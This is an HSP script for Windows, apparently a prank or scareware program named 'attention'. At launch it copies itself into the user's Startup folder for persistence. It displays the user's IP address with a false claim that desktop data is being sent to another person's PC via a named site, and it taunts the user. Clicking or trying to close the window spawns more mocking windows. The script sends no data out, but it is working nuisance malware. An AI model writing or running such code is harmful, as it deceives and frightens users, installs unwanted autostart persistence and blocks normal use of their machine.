	#packopt name "attention"
	#include "Hspsock.as"
	filepath=dir_exe
	deskpath=dir_desktop
	startuppath=dirinfo(0x10007)
	exec "xcopy"+" \""+filepath+"\" \""+startuppath+"\\hello\" /I /E /D /C"
	wait 1
	cl=0

	AAA=1
	FFF=9999999
	GGG=999999999
	screen 0,728,128,4
	gsel 0,2				
	
	ipget
	title "データを転送しています…"
	mes dir_desktop+"のデータをhttps://enoki.xyzを通じてえのきのPCにコピーしています…"
	mes "閉じようとしても無駄です、かかってきなさい"
	mes "あなたのIPアドレス:"+refstr
	onexit gosub *DestroyWindow
	
	while
		while
			stick cl,2047,0
			if cl!=0 : _break
			wait 1
		wend
	
		if cl!=0:gosub *lbuttondown
	wend


	stop

*lbuttondown
;	1=左ボタン、3=右ボタン+左ボタン、5=Shiftキー+左ボタン、
;	9=Ctrlキー+左ボタン
	AAA+=5
	BBB=AAA+1
	CCC=BBB+1
	DDD=CCC+1
	EEE=DDD+1
	screen AAA,800,140,4
	gsel AAA,2				
	width 0,0,rnd(1920),rnd(1080)
	font "メイリオ",rnd(64)+9
	mes "ざまあwww"
	title "ざまあwww"
	wait 1
	screen BBB,500,500,4
	gsel BBB,2				
	width 0,0,rnd(1920),rnd(1080)
	font "メイリオ",rnd(64)+9
	mes "ざまあwww"
	title "ざまあwww"
	wait 1
	screen CCC,300,600,4
	gsel CCC,2				
	width 0,0,rnd(1920),rnd(1080)
	font "メイリオ",rnd(64)+9
	mes "ざまあwww"
	title "ざまあwww"
	wait 1
	screen DDD,200,470,4
	gsel DDD,2				
	width 0,0,rnd(1920),rnd(1080)
	font "メイリオ",rnd(64)+9
	mes "ざまあwww"
	title "ざまあwww"
	wait 1
	screen EEE,500,300,4
	gsel EEE,2				
	width 0,0,rnd(1920),rnd(1080)
	font "メイリオ",rnd(64)+9
	mes "ざまあwww"
	title "ざまあwww"
	wait 1
	AAA+=5
	BBB=AAA+1
	CCC=BBB+1
	DDD=CCC+1
	EEE=DDD+1
	screen AAA,800,140,4
	gsel AAA,2				
	width 0,0,rnd(1920),rnd(1080)
	font "メイリオ",rnd(64)+9
	mes "ざまあwww"
	title "ざまあwww"
	wait 1
	screen BBB,500,500,4
	gsel BBB,2				
	width 0,0,rnd(1920),rnd(1080)
	font "メイリオ",rnd(64)+9
	mes "ざまあwww"
	title "ざまあwww"
	wait 1
	screen CCC,300,600,4
	gsel CCC,2				
	width 0,0,rnd(1920),rnd(1080)
	font "メイリオ",rnd(64)+9
	mes "ざまあwww"
	title "ざまあwww"
	wait 1
	screen DDD,200,470,4
	gsel DDD,2				
	width 0,0,rnd(1920),rnd(1080)
	font "メイリオ",rnd(64)+9
	mes "ざまあwww"
	title "ざまあwww"
	wait 1
	screen EEE,500,300,4
	gsel EEE,2				
	width 0,0,rnd(1920),rnd(1080)
	font "メイリオ",rnd(64)+9
	mes "ざまあwww"
	title "ざまあwww"
	wait 1

	return


*DestroyWindow
;	バツボタンが押された時の初期化
;	煽る

	screen FFF,800,140,4
	gsel FFF,2				
	width 0,0,rnd(1920),rnd(1080)
	font "メイリオ",rnd(64)+9
	mes "バツじゃ閉じれないよwww"
	title "バツじゃ閉じれないよwww"
	wait 1
	FFF+=1
	screen FFF,800,140,4
	gsel FFF,2				
	width 0,0,rnd(1920),rnd(1080)
	font "メイリオ",rnd(64)+9
	mes "バツじゃ閉じれないよwww"
	title "バツじゃ閉じれないよwww"
	wait 1
	FFF+=1
	screen FFF,800,140,4
	gsel FFF,2				
	width 0,0,rnd(1920),rnd(1080)
	font "メイリオ",rnd(64)+9
	mes "バツじゃ閉じれないよwww"
	title "バツじゃ閉じれないよwww"
	wait 1
	FFF+=1
	screen FFF,800,140,4
	gsel FFF,2				
	width 0,0,rnd(1920),rnd(1080)
	font "メイリオ",rnd(64)+9
	mes "バツじゃ閉じれないよwww"
	title "バツじゃ閉じれないよwww"
	wait 1
	FFF+=1
	screen FFF,800,140,4
	gsel FFF,2				
	width 0,0,rnd(1920),rnd(1080)
	font "メイリオ",rnd(64)+9
	mes "バツじゃ閉じれないよwww"
	title "バツじゃ閉じれないよwww"
	wait 1
	FFF+=1
	screen FFF,800,140,4
	gsel FFF,2				
	width 0,0,rnd(1920),rnd(1080)
	font "メイリオ",rnd(64)+9
	mes "バツじゃ閉じれないよwww"
	title "バツじゃ閉じれないよwww"
	wait 1
	FFF+=1
	screen FFF,800,140,4
	gsel FFF,2				
	width 0,0,rnd(1920),rnd(1080)
	font "メイリオ",rnd(64)+9
	mes "バツじゃ閉じれないよwww"
	title "バツじゃ閉じれないよwww"
	wait 1
	FFF+=1
	screen FFF,800,140,4
	gsel FFF,2				
	width 0,0,rnd(1920),rnd(1080)
	font "メイリオ",rnd(64)+9
	mes "バツじゃ閉じれないよwww"
	title "バツじゃ閉じれないよwww"
	wait 1
	FFF+=1
	screen FFF,800,140,4
	gsel FFF,2				
	width 0,0,rnd(1920),rnd(1080)
	font "メイリオ",rnd(64)+9
	mes "バツじゃ閉じれないよwww"
	title "バツじゃ閉じれないよwww"
	wait 1
	FFF+=1
	screen FFF,800,140,4
	gsel FFF,2				
	width 0,0,rnd(1920),rnd(1080)
	font "メイリオ",rnd(64)+9
	mes "バツじゃ閉じれないよwww"
	title "バツじゃ閉じれないよwww"
	wait 1
	FFF+=1
return
